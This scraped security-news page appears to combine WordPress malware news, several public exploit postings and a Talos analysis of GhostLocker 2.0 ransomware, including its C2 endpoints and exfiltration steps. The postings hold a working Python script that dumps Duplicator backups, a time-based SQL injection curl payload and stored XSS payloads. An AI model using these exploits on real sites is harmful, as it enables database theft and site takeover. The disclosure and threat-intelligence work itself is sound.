A new malware campaign is leveraging a high-severity security flaw in the Popup Builder plugin for WordPress to inject malicious JavaScript code.
According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks.
"These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024," security researcher

Malware Campaign Exploits Popup Builder WordPress Plugin to Infect 3,900+ Sites

WordPress Duplicator plugin versions prior to 1.5.7.1 suffer from an unauthenticated sensitive data exposure vulnerability that can lead to account takeover.

    # Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -Unauthenticated Sensitive Data Exposure to Account Takeover# Google Dork: inurl:("plugins/duplicator/")# Date: 2023-12-04# Exploit Author: Dmitrii Ignatyev# Vendor Homepage:https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free# Software Link: https://wordpress.org/plugins/duplicator/# Version: 1.5.7.1# Tested on: Wordpress 6.4# CVE : CVE-2023-6114# CVE-Link :https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/Asevere vulnerability has been discovered in the directory*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not onlyexposes extensive information about the site, including itsconfiguration, directories, and files, but more critically, itprovides unauthorized access to sensitive data within the database andall data inside. Exploiting this vulnerability poses an imminentthreat, leading to potential *brute force attacks on password hashesand, subsequently, the compromise of the entire system*.*POC*:1) It is necessary that either the administrator or auto-backup worksautomatically at the scheduled time2) Exploit will send file search requests every 5 seconds3) I attack the site with this vulnerability using an exploitExploit sends a request to the server every 5 seconds along the path“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and ifit finds something in the index of, it instantly parses all the dataand displays it on the screenExploit (python3):import requestsfrom bs4 import BeautifulSoupimport reimport timeurl = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"processed_files = set()def get_file_names(url):    response = requests.get(url)    if response.status_code == 200 and len(response.text) > 0:        soup = BeautifulSoup(response.text, 'html.parser')        links = soup.find_all('a')        file_names = []        for link in links:            file_name = link.get('href')            if file_name != "../" and not file_name.startswith("?"):                file_names.append(file_name)        return file_names    return []def get_file_content(url, file_name):    file_url = url + file_name    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):        print(f"Ignoring file: {file_name}")        return None    file_response = requests.get(file_url)    if file_response.status_code == 200:        return file_response.text    return Nonewhile True:    file_names = get_file_names(url)    if file_names:        print("File names on the page:")        for file_name in file_names:            if file_name not in processed_files:                print(file_name)                file_content = get_file_content(url, file_name)                if file_content is not None:                    print("File content:")                    print(file_content)                    processed_files.add(file_name)    time.sleep(5)-- With best regards,Dmitrii Ignatyev, Penetration Tester

WordPress Duplicator Data Exposure / Account Takeover

WordPress Hide My WP plugin versions 6.2.9 and below suffer from an unauthenticated remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11# Original Researcher: Xenofon Vassilakopoulos# Exploit Author: Xenofon Vassilakopoulos# Submitter: Xenofon Vassilakopoulos# Vendor Homepage: https://wpwave.com/# Version: Hide My WP v6.2.8 and prior# Tested on: Hide My WP v6.2.7# Impact: Database Access# CVE: CVE-2022-4681# CWE: CWE-89# CVSS Score: 8.6 (high)## DescriptionThe plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.## Proof of Conceptcurl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

WordPress Hide My WP SQL Injection

MongoDB versions 2.0.1, 2.1.1, 2.1.4, and 2.1.5 appear to suffer from multiple localized password disclosure issues.

    Title: MongoDB MONGOSH Password Exposure VulnerabilityProduct:                   MongoDB databaseTool:                      mongoshAffected Version(s):       2.0.1 , 2.1.1,2.1.4,2.1.5Tested Version(s):         2.0.1 , 2.1.1,2.1.4,2.1.5Risk Level:                LowAuthor of Advisory:        Emad Al-Mousa*****************************************Vulnerability Details:Vulnerability in MongoDB database system "mongosh" which  is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas , locally, or on another remote host. So, its basically a command line utility to run database commands and java scripts against back-end MongoDB database system.MONGOSH has two vulnerbailites where passwords can be exposed and leaked in which an attacker to the operating system can weaponize for unauthorized access to the MongoDB database system.*****************************************Proof of Concept (PoC):Vulnerability No1. : passwordPrompt() showing password displayed in clear textper documentation:https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPromptThe password should not be displayed, however I found out that it appears clearly in the prompt !The password function passwordPrompt() was tested and used in conjunction with db.createUser, db.changeUserPassword, db.auth commands and all of them were allowing clear text password to appear.admin> use adminalready on db adminadmin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})Enter passwordmongo*****{ ok: 1 }admin>Vulnerability No2. : Password is exposed in mongosh_repl_history file with db.auth commandMongosh was tested with both “remove”& “remove-redact” modesconfig.set (redactHistory, “remove-redact”)config.set (‘redactHistory’, “remove”)In Linux Red Hat Environment the file: $MONGOHOME/.mongodb/mongosh/mongosh_repl_historyContains the password in clear text for historical  commands run for authentication db.auth() and db.createUser  , per documentation: https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials but this didn’t happen !In windows operating system environment the file: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongoshCommands running for database creation db.createUser and db.auth()  are logging the username, password explicitly as shown below:cat mongosh_repl_historyuse admindb.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})*****************************************References:https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompthttps://www.mongodb.com/docs/mongodb-shell/logs/

MongoDB 2.0.1 / 2.1.1 / 2.1.4 / 2.1.5 Local Password Disclosure

It’s important to be vigilant about tax-related scams any time these deadlines roll around, regardless of what country you’re in, but it’s not like you need to be particularly more skeptical in March and April.

Thursday, March 7, 2024 14:00

It’s that time of the year when not only do you have to be worried about filing your federal taxes in the U.S., you must also be on the lookout for a whole manner of tax-related scams.  

These are something that pop up every year through email, texts, phone calls and even physical mail — phony promises to get your tax return back faster, file your taxes “easy and free” or maximizing your possible return. Usually, the bad actors behind these are either looking to steal your money or personal information.  

One scam from last year’s tax season could have cost consumers up to $5,000 in penalties for trying to claim a fraudulent tax credit.  

And it turns out this isn’t just a problem in the U.S., either. We published new research last week into a trojan malware that’s been infecting victims in Mexico with tax-related spam emails and other social engineering tactics.  

Many countries across the world all have tax filing deadlines around the same time — Japan’s is just around the corner on March 15, in the U.S. it’s April 15, and several countries (Brazil, Canada, Chile, etc.) all share an April 30 filing deadline. So, adversaries all over the globe are going to be leveraging tax-related topics in their spam emails and social engineering campaigns in the coming weeks, trying to steal money, infect devices with malware, or steal critical personal information. 

It’s important to remember that this isn’t “peak spam season” or anything, though, and it’s not the time to spread FUD that, “Oh, your inboxes are going to be flooded with spam!” 

As I’ve written and talked about before, there isn’t more spam during tax season, it’s just different. Think about the confirmation bias that pops up when you buy a new car, and then suddenly you start seeing that car everywhere else on the road when you didn’t notice it as much before.  

Talos’ telemetry indicates that spam hasn’t increased during tax filing season in the U.S. for many years, and attackers’ tactics largely stay the same: Try to create a convincing offer, document, or link, and try to convince the target to engage with that social engineering in some form.  

It’s important to be vigilant about tax-related scams any time these deadlines roll around, regardless of what country you’re in, but it’s not like you need to be particularly more skeptical in March and April than any other time of the year. As soon as the tax filing deadline comes and goes, attackers will just start looking for the next hot topic to include in their phishing emails — presidential primaries, summer vacation deals or fake Amazon gift cards. 

If you want to hear more about this, listen to the episode of Talos Takes on this topic from last year below. 

**The one big thing **

An APT known as GhostSec has increased its ransomware activities over the past year and is now conducting “double extortion” ransomware attacks with fellow group Stormous. GhostSec and Stormous have also launched a new ransomware-as-a-service (RaaS) program STMX\_GhostLocker and are actively recruiting new affiliates or members.  

**Why do I care? **

Talos observed the GhostSec and Stormous ransomware groups operating together to conduct several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Egypt, Vietnam, Thailand and more nations, according to our assessment of the disclosure messages posted by the group in their Telegram channels and Stormous ransomware data leak site. This shows that the groups’ activities are not going to be contained just in one region or industry. RaaS has been a popular business model for many ransomware groups recently, which opens the door to other actors to use GhostSec’s tools by just paying them money.  

**So now what? **

Talos has released new IOCs to provide defenders with new ways to block these ransomware actors. One of the implants GhostSec specifically relies on injects an admin bypass and hacking tool targeting the WordPress content management system. Any WordPress users should make sure their login credentials are up-to-date and strong and check their site to ensure there aren’t any illegitimate plugins or processes running on their site.  

**Top security headlines of the week **

**A fake ransomware gang calling itself “Mogilevich” admitted that they made up a claim that it had hacked video game developer Epic and stolen personal information and game source code.** A leak page from the group claimed to have 200GB of data stolen from the company available for sale to other threat actors, or they would return the stolen information to Epic in exchange for a ransom payment. The group claimed it had "email, passwords, full name, payment information, source code and many other data." Epic immediately came forward sand said it had not detected any evidence of a hack or data breach. A few days after the claims went public, representatives from Mogilevich later came forward and called themselves “professional fraudsters” and they never hacked Epic’s network. Epic is known for the popular online platform and game “Fortnite.” The fraudsters also admitted that they had sold fake ransomware infrastructure to other would-be actors who wanted to carry out attacks themselves, including tricking one buyer out of $85,000. (Eurogamer, Cyber Daily) 

**A popular series of white-label security cameras are littered with an array of security vulnerabilities that could allow adversaries to collect images from their cameras without users knowing.** The cameras are manufactured by the same company, but sold under the labels of Eken and Tuck on popular websites like Amazon, Walmart, Sears and Temu. The doorbells also do not have a visible ID issued by the Federal Communications Commission (FCC) that’s normally required by the agency, which technically makes them illegal to distribute in the U.S., though many of them were still for sale as of late February. The vulnerabilities affect more than 10 different products, which are all controlled by the same app that’s available on the Android app store. All an adversary would need to do to exploit the vulnerabilities and spy on the camera would be to acquire the serial number — no notification is sent to the doorbell’s owner when there’s a new pairing, and the adversary doesn’t even need an account username or password. Retailers that list the cameras for sale did not respond to a request for comment from Consumer Reports, the outlet that performed the research. (Consumer Reports, TechCrunch) 

**Payment systems across the U.S. health care system are offline, with many doctors having to switch to paper billing,** after a massive data breach at Change Healthcare, a subsidiary of the UnitedHealth insurance company. Change Healthcare first disclosed the breach on Feb. 21 after adversaries disrupted operations for the company, which processes 15 billion health care-related transactions every year. Now the U.S. Department of Health and Human Services is urging health care systems and doctors who use Change to start developing alternatives, as they are unsure when systems will be back online. Change Healthcare is a system that connects doctors, hospitals and other health care providers with insurance companies to pay for medical care and authorize assorted services for patients. The follow-on effects have also been difficult on providers, who are now being faced with rent and other bills that they can’t pay because they still haven’t been paid by insurance companies. (USA Today, The New York Times) 

**Can’t get enough Talos? ** **Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_  

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5**: 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934   
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c   
**Typical Filename:** Wextract   
**Claimed Product:** Internet Explorer   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc   
**MD5:** 4813fa6d610e180b097eae0ce636d2aa   
**Typical Filename:** xmrig.exe   
**Claimed Product:** XMRig   
**Detection Name:** Trojan.GenericKD.70491190 

**SHA 256:** a75004c0bf61a2300258d99660552d88bf4e1fe6edab188aad5ac207babcf421   
**MD5:** c44f8ef0bbaeee256bfb62561c2a17db   
**Typical Filename:** ggzokjcqkgcbqiaxoohw.exe   
**Claimed Product:** N/A    
**Detection Name:** Symmi:GenMalicious-tpd

You’re going to start seeing more tax-related spam, but remember, that doesn’t actually mean there’s more spam

Threat actors are conducting brute-force attacks against WordPress sites by leveraging malicious JavaScript injections, new findings from Sucuri reveal.
The attacks, which take the form of distributed brute-force attacks, “target WordPress websites from the browsers of completely innocent and unsuspecting site visitors,” security researcher Denis Sinegubko said.
The activity is part of a&

Hacked WordPress Sites Abusing Visitors' Browsers for Distributed Brute-Force Attacks

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

**WordPress Neon Text 1.1 Cross Site Scripting**

Posted Mar 5, 2024

Authored by Eren Car

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2023-5817

SHA-256 | f6fa131d3df7c7fa0667803c7757179d6f0f6967ebbb7d6ee2469662460a8a4e

Download | Favorite | View

**WordPress Neon Text 1.1 Cross Site Scripting**

    # Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)# Date: 2023-11-15# Exploit Author: Eren Car# Vendor Homepage: https://www.eralion.com/# Software Link: https://downloads.wordpress.org/plugin/neon-text.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.4.1# CVE : CVE-2023-5817# 1. Description:The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions.   # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the posts page and create new post.  c. Add shorcode block and insert the following payload:      [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]          d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.

**File Tags**

*   ActiveX (933)
*   Advisory (84,370)
*   Arbitrary (16,579)
*   BBS (2,859)
*   Bypass (1,818)
*   CGI (1,032)
*   Code Execution (7,578)
*   Conference (687)
*   Cracker (844)
*   CSRF (3,370)
*   DoS (24,373)
*   Encryption (2,381)
*   Exploit (52,611)
*   File Inclusion (4,246)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,832)
*   Intrusion Detection (905)
*   Java (3,117)
*   JavaScript (887)
*   Kernel (6,944)
*   Local (14,657)
*   Magazine (586)
*   Overflow (12,989)
*   Perl (1,430)
*   PHP (5,174)
*   Proof of Concept (2,364)
*   Protocol (3,687)
*   Python (1,595)
*   Remote (31,291)
*   Root (3,613)
*   Rootkit (519)
*   Ruby (617)
*   Scanner (1,647)
*   Security Tool (7,962)
*   Shell (3,236)
*   Shellcode (1,217)
*   Sniffer (899)
*   Spoof (2,255)
*   SQL Injection (16,491)
*   TCP (2,420)
*   Trojan (688)
*   UDP (896)
*   Virus (668)
*   Vulnerability (32,461)
*   Web (9,836)
*   Whitepaper (3,768)
*   x86 (966)
*   XSS (18,130)
*   Other

**File Archives**

*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,060)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,978)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,466)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,786)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (15,203)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,336)
*   UNIX (9,371)
*   UnixWare (187)
*   Windows (6,635)
*   Other

WordPress Neon Text 1.1 Cross Site Scripting

KK Star Ratings versions prior to 5.4.6 suffer from rate tampering via a race condition vulnerability.

    # Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via RaceCondition# Google Dork: inurl:/wp-content/plugins/kk-star-ratings/# Date: 2023-11-06# Exploit Author: Mohammad Reza Omrani# Vendor Homepage: https://github.com/kamalkhan# Software Link: https://wordpress.org/plugins/kk-star-ratings/# WPScan :https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/# Version: 5.4.6# Tested on: Wordpress 6.2.2# CVE : CVE-2023-4642# POC:1- Install and activate kk Star Ratings.2- Go to the page that displays the star rating.3- Using Burp and the Turbo Intruder extension, intercept the ratingsubmission.4- Send the request to Turbo Intruder using Action > Extensions > TurboIntruder > Send to turbo intruder.5- Drop the initial request and turn Intercept off.6- In the Turbo Intruder window, add "%s" to the end of the connectionheader (e.g. "Connection: close %s").7- Use the code `examples/race.py`.8- Click "Attack" at the bottom of the window. This will send multiplerequests to the server at the same moment.9- To see the updated total rates, reload the page you tested.

KK Star Ratings Race Condition

Cisco Talos observed a surge in GhostSec, a hacking group’s malicious activities since this past year. GhostSec has evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.

Tuesday, March 5, 2024 08:00

*   Cisco Talos observed a surge in GhostSec, a hacking group’s malicious activities since this past year.
*   GhostSec has evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.
*   The GhostSec and Stormous ransomware groups are jointly conducting double extortion ransomware attacks on various business verticals in multiple countries. 
*   GhostLocker and Stormous ransomware have started a new ransomware-as-a-service (RaaS) program STMX\_GhostLocker, providing various options for their affiliates. 
*   Talos also discovered two new tools in GhostSec arsenal, the “GhostSec Deep Scan tool” and “GhostPresser,” both likely being used in the attacks against websites.

**Victimology of ransomware attacks**

Talos observed the GhostSec and Stormous ransomware groups operating together to conduct several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand and Indonesia according to our assessment of the disclosure messages posted by the group in their Telegram channels and Stormous ransomware data leak site.  

The collaborative operation affected victims across various business verticals, according to disclosures made by the groups in their Telegram channels.

Talos’ observation in GhostSec’s Telegram channels highlighted the group’s continued attacks on Israel’s Industrial systems, critical infrastructure and technology companies. On Nov. 12, 2023, they claimed that the affected organizations also included the Ministry of Defense in Israel.

Example of GhostSec’s Telegram chat message.

**GhostSec has remained active since this past year**

GhostSec is a hacker group that claims to be one of a modern-day Five Families group that includes ThreatSec, Stormous, Blackforums and SiegedSec on their Telegram channels. GhostSec is financially motivated, conducting single and double extortion attacks on victims across various geographies. They have also conducted several denial-of-service (DoS) attacks and have taken down victims’ websites, according to their Telegram channel messages. Their claims also showed us that their primary focus is raising funds for hacktivists and threat actors through their cybercriminal activities. 

The actor’s name, GhostSec, resembles the well-known hacktivist Ghost Security Group, primarily focusing on counterterrorism efforts and targeting pro-ISIS websites. The Ghost Security Group mentioned in their blog that another hacking group mimics their identity. 

In October 2023, GhostSec announced a new ransomware-as-a-service (RaaS) framework called GhostLocker. After their successful collaborative operations with the Stormous ransomware group in July 2023 against Cuban ministries, on Oct. 14, 2023, the Stormous gang announced that they would use the GhostLocker ransomware program in addition to their StormousX program. 

Stormous ransomware Telegram chat message.

Since then, the GhostSec and Stormous ransomware groups have jointly conducted double extortion ransomware attacks targeting victims across various business verticals in multiple countries. Along with the ransomware attacks, GhostSec seemed to be conducting attacks against corporate websites, including a national railway operator in Indonesia and one of Canada’s leading energy companies. They have likely leveraged their GhostPresser tool along with the cross-site scripting attack technique to compromise the websites. 

On Feb. 24, 2024, Stormous group mentioned on “The Five Families” Telegram channel that they have started their new ransomware-as-a-service (RaaS) program “STMX\_GhostLocker” along with their partners in GhostSec. The new program is made up of three categories of services for the affiliates: paid, free, and another for the individuals without a program who only want to sell or publish data on their blog (PYV service). 

The group has shared their working model flow diagrams for member and non-member affiliates on their Telegram channels.

Stmx\_GhostLocker member affiliate working model.

Stmx\_GhostLocker non-member affiliate working model.

Stormous ransomware and GhostSec have rebuilt the new official blog of their RAAS program Stmx\_GhostLocker on the TOR network, with features for the affiliates to join their program and disclose their victim’s data. Their blog dashboard shows the count of victims and disclosures of victims’ information with a link to their leaked data. They also display the largest ransom as $500,000 USD — we are not sure if that is the highest ransom payment they have received. 

Redacted picture of Stmx\_GhostLocker blog. 

**Evolution of GhostLocker 2.0 ransomware **

In November 2023, GhostSec announced a newer version of their GhostLocker ransomware called GhostLocker 2.0. Recently we observed that they have again started advertising their latest Golang version “GhostLocker 2.0” by calling it “GhostLocker V2” and mentioning their ongoing work on the GhostLocker V3, indicating their continuous evolution in developing their toolset. 

GhostLocker 2.0 encrypts the files on the victim’s machine using the file extension “.ghost” and drops and opens a ransom note. The ransom note has changed from its previous version, where the operator tells users to secure the encryption ID displayed in the ransom note and share it with them in their chat service during the negotiation by clicking “Click me.” The operator also mentions that the victim’s stolen data will be disclosed if they fail to contact them in seven days. 

Ransom Note of GhostLocker (left) and ransom Note of GhostLocker 2.0 (right).

The GhostLocker RAAS has a C2 panel where the affiliates can get an overview of their attacks and gains. When deployed on the victim’s machine, the ransomware binaries will register to the C2 panel, and the affiliates can track the encryption status on the victim’s machine. Talos discovered the GhostLocker 2.0 C2 server with the IP address 94\[.\]103\[.\]91\[.\]246 located in Moscow, Russia. We observed that the geolocation of the C2 server is similar to that of the C2 servers of earlier versions of the GhostLocker ransomware that security researchers at Uptycs reported. 

GhostLocker C2 panels.

GhostLocker RAAS provides its affiliates with the ransomware builder, which contains configuration options, including the mode of persistence that the ransomware binary can establish after being successfully run on the victim machine, target directories to encrypt, and techniques to evade the detections, such as killing the defined processes or services or running the arbitrary command to kill the scheduled task or bypass the User Account Controls (UAC). 

GhostLocker 2.0 ransomware builder panel.

Talos discovered the new variant of GhostLocker ransomware, “GhostLocker 2.0” in the wild on Nov. 15, 2023. The majority of the ransomware functionality of GhostLocker 2.0 remains the same as that of its earlier version GhostLocker, which was written in Python, excluding the watchdog component that the operator had used in earlier versions to start the dropped ransomware binary from the victim’s machine Windows Startup location and the AES encryption key length of 256 bits with that of 128 bits in the earlier version. 

During the initial execution, GhostLocker 2.0 copies itself to the Windows Startup folder to establish persistence. It also generates a random string of 32 bytes and uses the generated string as the filename for its dropped copy in the Windows Startup folder. 

After establishing the persistence, the ransomware establishes the connection to the C2 server through the URL hxxp\[://\]94\[.\]103\[.\]91\[.\]246\[/\]incrementLaunch.

A function that initiates the connection to C2.

After establishing a successful connection with the C2 server, the ransomware generates the secret key and the encryption ID and gathers the victim’s IP address, infection date and other information from its configuration parameters, including encryption status, ransom amount and a victim identifier string, to create a JSON file in the victim’s machine memory.

JSON file generated in the machine’s memory.

The generated JSON file is sent to the C2 server through the URL hxxp\[://\]94\[.\]103\[.\]91\[.\]246\[/\]addInfection to register the victim’s machine infection in the C2 panel.

Function to register the infection to the C2 by sending the JSON file.

After registering the victim’s machine infection with the C2 panel, the ransomware attempts to terminate the defined processes or services or Windows scheduled tasks from its configuration parameters in the victim’s machine to evade detection. 

Functions to stop Windows scheduled tasks. 

GhostLocker 2.0 searches for the target files on the victim’s machine according to the file extension list defined by the threat actor, and before the encryption routine starts, it will upload the target files to the C2 server through the URL “hxxp\[://\]94\[.\]103\[.\]91\[.\]246\[/\]upload” using HTTP post method. In the GhostLocker 2.0 sample we analyzed, the actor has configured the ransomware to exfiltrate and encrypt the files that have file extensions .doc, .docx, .xls and .xlsx. 

Function to exfiltrate the target files to the C2 server. 

After successfully exfiltrating, GhostLocker 2.0 encrypts the targeted files and appends “.ghost” as the file extension for the encrypted files. During the encryption process, GhostLocker 2.0 skips the “C:\\Windows” folder. After completing the encryption routine, the ransomware drops the embedded ransom note to an HTML file with the filename “Ransomnote.html” on the victim’s desktop and launches it using the Windows \`Start\` command. 

A function that drops and opens ransom notes.

Talos’ research uncovered two new tools in GhostSec’s arsenal that the hacking group claimed to have used in compromising legitimate websites. One of them is the “GhostSec Deep Scan toolset” to scan legitimate websites recursively, and another is a hack tool to perform cross-site scripting (XSS) attacks called “GhostPresser.”

The GhostSec deep scan toolset is a Python utility that an attacker can use to scan the websites of their potential targets. 

The tool has several modules to perform the following scans on the targeted websites:

*   Perform a user-specific search. 
*   Scans multiple websites.
*   Extract the hyperlinks on the website. 
*   Performs a deep scan and analyzes the technologies used to build the web page.
*   Scans the security protocols to detect the SSL/TLS and HSTS (HTTP Strict Transport Security).
*   Perform the website content analysis and extract the contents to a file.
*   Performs a WhoIs lookup.
*   Checks for the existence of any broken links in the website.

The tool also contains placeholders to perform specific functions including SSL analysis, DNS lookup, checks for robots.txt and sitemap.xml, CVE scans on the targeted website, and an advanced search based on the file type, date range and the custom criteria of the websites, indicating the GhostSec’s continuous evolution of tools in their arsenal. 

One of the modules that stood out to us is the \`deep\_scan\` function that the actor has defined to parse and scrape information from the targeted web pages and assess the technologies used in the web page. It is done by using the Python libraries Beautiful Soup, a Python package used for parsing data out of HTML and XML files, and the BuiltWith Python library, a Python package used to detect the technology used by a website, such as Apache, JQuery and WordPress. 

A function to parse and identify the technology used in the webpage.

GhostPresser, an admin bypass and hacking tool targeting the WordPress content management system, is a shell script that GhostSec claims to have used in an XSS attack against a legitimate website in Canada. The tool appears to be under enhancement process as we spotted several placeholders in the tool to include functionalities to perform audits on the targeted websites. We are not sure at this moment about what type of audits the threat actor intends to implement in their tool. 

GhostPresser tool.

A threat actor can achieve the following actions after successfully injecting the GhostPresser into a targeted website on WordPress. 

*   Bypass logins and perform actions such as test cookies. 
*   Activate and deactivate a plugin. 
*   Change WordPress settings.
*   Create a new user. 
*   Update WordPress core information. 
*   Functions to install a new theme.

Below is an example of the function in the GhostPresser to install new themes in WordPress.

Function to install new WordPress theme.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 62983-62989, and 300818-300820. 

ClamAV detections are also available for this threat:

Win.Ransomware.GhostSec-10020906-0

**Indicators of Compromise**

Indicators of Compromise associated with this threat can be found here.

GhostSec’s joint ransomware operation and evolution of their arsenal

WordPress IDonate Blood Request Management System plugin versions 1.8.1 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: IDonate – blood request management system <=1.8.1 - StoredCross-Site Scripting (Authenticated)# Date: 29-02-2024# Exploit Author: Laburity Research Team# Vendor Homepage: https://wordpress.org/plugins/idonate/# Version: <=1.8.1# Tested on: Firefox# Contact me: contact [at] laburity.com# Summary:A cross site scripting stored vulnerability has been identified inWordPress Plugin IDonate – blood request management system version lessthen 1.8.1. that allows Authenticated users to run arbitrary javascriptcode inside WordPress using blood request management system Plugin.# POC1- Navigate tohttp://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret keyand in Recaptcha Site key3- Click on save changes.4- While clicking on the payload text, XSS will trigger.# Vulnerable Code:```    public function idonate_recaptcha_secretkey_callback()    {if( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ){$secretkey = $this->general_options['idonate_recaptcha_secretkey'];}else{$secretkey = '';}//        printf(            '<input type="text" id="idonate_recaptcha_secretkey" value="%s"name="idonate_general_option_name[idonate_recaptcha_secretkey]"  />',            $secretkey        );    }```Secrets keys (idonate_recaptcha_secretkey) are printed without sanitization.

Tag

#wordpress